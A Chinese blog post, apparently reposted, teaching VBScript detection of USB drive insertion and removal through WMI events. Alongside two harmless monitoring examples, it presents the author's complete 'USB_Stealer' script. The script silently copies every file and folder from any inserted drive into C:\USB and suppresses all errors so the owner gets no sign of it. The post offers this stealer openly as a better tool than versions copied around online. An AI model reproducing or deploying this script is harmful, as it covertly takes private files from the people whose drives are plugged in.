用VBS检测U盘插入与弹出事件的代码

时间:2022-09-11 13:06:36

可以说,对WMI的掌握程度的多少直接决定了你的VBS水平高低。看过网上普遍流传VBS版U盘小偷程序,基本上都是靠无限循环实现的,一点技术含量也没有,文章的末尾给出了我写的VBS版U盘小偷程序的下载地址。虽然用WMI也得无限循环,但是效率是不一样的。

使用WMI的Win32_VolumeChangeEvent类就可以实现,下面是示例代码,更详细的信息请参考MSND文档

复制代码 代码如下:


Const Configuration_Changed = 1
Const Device_Arrival = 2
Const Device_Removal = 3
Const Docking = 4
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colMonitoredEvents = objWMIService. _
ExecNotificationQuery( _
"Select * from Win32_VolumeChangeEvent")
Do
Set objLatestEvent = colMonitoredEvents.NextEvent
Select Case objLatestEvent.EventType
Case Device_Arrival
WScript.Echo "U盘插入,盘符为" & _
objLatestEvent.DriveName
Case Device_Removal
WScript.Echo "U盘弹出,盘符为" & _
objLatestEvent.DriveName
End Select
Loop


我也写了一个U盘小偷程序,自以为比网上抄来抄去的代码要好,感兴趣的可以下载来看看。

复制代码 代码如下:


'==========================================
'Name : USB_Stealer
'Date : 2010/5/25
'Author : Demon
'Copyright : Copyright (c) 2010 Demon
'E-Mail : still.demon@gmail.com
'QQ : 380401911
'Website : http://demon.tw
'==========================================
'Option Explicit
On Error Resume Next
Const Target_Folder = "C:\USB"

Call Main()

Sub Main()
On Error Resume Next
Const Device_Arrival = 2
Const Device_Removal = 3
Const strComputer = "."
Dim objWMIService, colMonitoredEvents, objLatestEvent

Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colMonitoredEvents = objWMIService. _
ExecNotificationQuery( _
"Select * from Win32_VolumeChangeEvent")
Do
Set objLatestEvent = colMonitoredEvents.NextEvent
Select Case objLatestEvent.EventType
Case Device_Arrival
Copy_File objLatestEvent.DriveName
End Select
Loop
End Sub

Sub Copy_File(Folder_Path)
On Error Resume Next
Dim fso,file,folder
Set fso = CreateObject("scripting.filesystemobject")

If Not fso.FolderExists(Target_Folder) Then
fso.CreateFolder(Target_Folder)
End If

For Each file In fso.GetFolder(Folder_Path).Files
file.Copy Target_Folder & "\" & file.Name,True
Next

For Each folder In fso.GetFolder(Folder_Path).SubFolders
folder.Copy Target_Folder & "\" & folder.Name,True
Next
End Sub


鉴于很多人反映之前写的那篇在XP下无效,做了一下修改。说是修改,其实是直接复制粘贴脚本专家的代码。

复制代码 代码如下:


strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set colEvents = objWMIService.ExecNotificationQuery _
("Select * From __InstanceOperationEvent Within 10 Where " _
& "TargetInstance isa 'Win32_LogicalDisk'")

Do While True
Set objEvent = colEvents.NextEvent
If objEvent.TargetInstance.DriveType = 2 Then
Select Case objEvent.Path_.Class
Case "__InstanceCreationEvent"
Wscript.Echo "Drive " & objEvent.TargetInstance.DeviceId & _
" has been added."
Case "__InstanceDeletionEvent"
Wscript.Echo "Drive " & objEvent.TargetInstance.DeviceId & _
" has been removed."
End Select
End If
Loop


参考链接:How Can I Determine When a Removable Drive Gets Connected?
大家应该可以看出学习vbs的好地方是哪了, 学习vbs官方的网站不得不去,服务器之家很多的vbs相关的教材都是来自微软官方的脚本专栏。
原文:http://demon.tw/programming/vbs-usb-insert-remove.html